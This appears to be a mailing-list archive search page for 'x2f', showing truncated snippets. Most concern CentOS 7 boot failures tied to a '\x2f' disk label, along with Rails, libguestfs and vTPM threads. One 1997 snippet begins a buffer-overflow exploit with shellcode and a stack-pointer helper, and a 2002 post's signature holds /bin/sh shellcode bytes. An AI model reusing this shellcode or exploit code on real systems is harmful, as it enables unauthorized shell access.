search for: x2f

Displaying 12 results from an estimated 12 matches for "x2f".

Did you mean: x0f
2016 Feb 18
2
CentOS 7, Xeon CPUs, not booting
...is with every one of the 327 kernels. In addition, it seems to happen also with the 229.20.1; the 229.14.1 has no such problem. >From the rdsosreport: starting at line 126: /dev/disk/by-label: total 0 lrwxrwxrwx 1 root 0 10 Jan 27 19:03 SWAP -> ../../sda2 lrwxrwxrwx 1 root 0 10 Jan 27 19:03 \x2f -> ../../sda3 lrwxrwxrwx 1 root 0 10 Jan 27 19:03 \x2fboot -> ../../sda1 Then, starting at line 1283: [ 3.317027] <servername> systemd[1]: Found device ST500NM0003-9ZM172 /. [ 3.317974] <servername> systemd[1]: Starting File System Check on /dev/disk/by-label/\x2f... [ 3...
2016 Feb 18
0
CentOS 7, Xeon CPUs, not booting
...s. In addition, it seems to > happen also with the 229.20.1; the 229.14.1 has no such problem. > > From the rdsosreport: > starting at line 126: > /dev/disk/by-label: > total 0 > lrwxrwxrwx 1 root 0 10 Jan 27 19:03 SWAP -> ../../sda2 > lrwxrwxrwx 1 root 0 10 Jan 27 19:03 \x2f -> ../../sda3 > lrwxrwxrwx 1 root 0 10 Jan 27 19:03 \x2fboot -> ../../sda1 > > Then, starting at line 1283: > [ 3.317027] <servername> systemd[1]: Found device ST500NM0003-9ZM172 /. > [ 3.317974] <servername> systemd[1]: Starting File System Check on > /dev...
2016 Feb 18
2
CentOS 7, Xeon CPUs, not booting, [SOLVED], bug filed
...; to happen also with the 229.20.1; the 229.14.1 has no such problem. >> >> From the rdsosreport: >> starting at line 126: >> /dev/disk/by-label: >> total 0 >> lrwxrwxrwx 1 root 0 10 Jan 27 19:03 SWAP -> ../../sda2 >> lrwxrwxrwx 1 root 0 10 Jan 27 19:03 \x2f -> ../../sda3 >> lrwxrwxrwx 1 root 0 10 Jan 27 19:03 \x2fboot -> ../../sda1 >> >> Then, starting at line 1283: >> [ 3.317027] <servername> systemd[1]: Found device ST500NM0003-9ZM172 >> /. >> [ 3.317974] <servername> systemd[1]: Starting F...
2012 Sep 14
3
directory /dev/disk/by-label
I am trying to create a CF card that boots 686 CentOS 6.3 On boot I get a message about /dev/disk/by-label/\x2f where \x2f is "/" cannot be found. Adding rdshell to the boot line and booting up sure enough the /dev/disk directory does not exist. What "creates" that early on in the boot process? My CF card was changed from UUID to LABEL. So I edited grub.conf and make root=LABEL=/ lik...
2016 Jan 29
2
CentOS 7, 327 kernel still crashing
> -----Original Message----- > From: Wes James [mailto:comptekki at me.com] > Sent: Wednesday, January 27, 2016 7:04 PM > To: CentOS mailing list > Subject: Re: [CentOS] CentOS 7, 327 kernel still crashing > > > > On Jan 27, 2016, at 1:47 PM, m.roth at 5-cent.us wrote: > > > > I've just added the following to the CentOS bugtracker for CentOS-7 > >
2002 Jul 02
0
pam and openssh
...a stock RedHat 7.3 GNU/Linux install and openssh is configured like this: ./configure --with-privsep-user=nobody --with-tcp-wrappers --with-pam --with-md5-passwords --with-ipv4-default ------------------------------------------------------------------------------- \x83\xec\x0c\x31\xc0\x31\xd2\x68\x2f\x73\x68\x21\x68\x2f\x62\x69\x6e\x89\xe3 \x88\x43\x07\x50\x50\x53\x53\xb0\x3b\xcd\x80\x89\xf6 Don't forget FreeBSD! -------------------------------------------------------------------------------
2011 Sep 19
0
Weird Parameter Encoding issue in Production Rails 3.1.0
...n the server side, the parameters are received as: {"utf8"=>"✓", "authenticity_token"=>"jOn16Uw3oUBPQfX02nt1IN8muZf150nTt24Ic4JgPvY=", "alert"=>{"status"=>"published", "title"=>"http:&#x2F;&#x2F;www", "headline"=>"&amp;headline"} Obviously, I do not wish to store the encoded values. I''m using Rails 3.1.0, unicorn, and Nginx. I have also tried this on a Rails 3.1.0, passenger, apache stack and had the same issue. In both cases, I''...
2016 Jan 27
2
CentOS 7, 327 kernel still crashing
...t kernel, vmlinuz-3.10.0-327.4.5.el7.x86_64, and the server fails to boot. It has failed on every 327 kernel. Server: Dell R420, 2 Xeons, 124G RAM. >From the rdsosreport.txt, the relevant portion is: [ 3.317974] <servername> systemd[1]: Starting File System Check on /dev/disk// by-label/\x2f... [ 3.320089] <servername> systemd-fsck[590]: Failed to detect device /dev/diskk /by-label// [ 3.320567] <servername> systemd[1]: systemd-fsck-root.service: main process exited, code=exited, status=1/FAILURE [ 3.320972] <servername> systemd[1]: Failed to start File System Check o...
2009 Aug 03
2
[PATCH] New commands to list devices by UUID and label
...t struct h1 *h12 = h12v; + + return h11->dev == h12->dev; +} + +static void +freer1 (void *h1v) +{ + struct h1 *h1 = h1v; + + free (h1->dname); + free (h1); +} + +/* Note that d->d_name can contain \x<X><X> sequences which + * we must replace with a character (eg. "\x2f" -> "/") + * + * How escaping really works in udev is very unclear, so this + * code is at best a guess. + */ +static int +getxdigit (char c) +{ + switch (c) { + case '0'...'9': return c - '0'; + case 'a'...'f': return c - 'a' + 1...
2011 May 02
2
Lasso with Categorical Variables
Hi! This is my first time posting. I've read the general rules and guidelines, but please bear with me if I make some fatal error in posting. Anyway, I have a continuous response and 29 predictors made up of continuous variables and nominal and ordinal categorical variables. I'd like to do lasso on these, but I get an error. The way I am using "lars" doesn't allow for the
1997 Sep 26
3
Forwarded mail....
...( 1050<buffer >1100) and a offset ( 1500<off >2500) mail me at admsmb@hotmail.com if u wanna some help */ #define DEFAULT_OFFSET 3500 #define DEFAULT_BUFFER_SIZE 3081 #define NOP 0x90 #include <stdlib.h> #include <strings.h> unsigned char shellcode[500] = "\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74" "\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f" "\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd" "\x80\xe8\xcc\xff\xff\xff"; unsigned long get_sp(void) { __asm__(&quo...
2012 Sep 17
9
[PATCH] Upgrade vtpmd to berlios version 0.7.4
...3d\x9d\xe8\x2e\xff\x15\xed\x0e\xce\x5f\x93" - "\x92\xeb\xd1\x96\x2b\x72\x18\x81\x79\x12\x9d\x9c\x40\xd7\x1a" -@@ -77,6 +78,8 @@ void tpm_init_data(void) - "\xd1\xc0\x8b\x5b\xa2\x2e\xa7\x15\xca\x50\x75\x10\x48\x9c\x2b" - "\x18\xb9\x67\x8f\x5d\x64\xc3\x28\x9f\x2f\x16\x2f\x08\xda\x47" - "\xec\x86\x43\x0c\x80\x99\x07\x34\x0f"; -+#endif -+ - int i; - /* reset all data to NULL, FALSE or 0 */ - memset(&tpmData, 0, sizeof(tpmData)); -@@ -152,44 +155,43 @@ void tpm_release_data(void) - - #ifdef TPM_STORE_TO_FILE - --#include <linux/...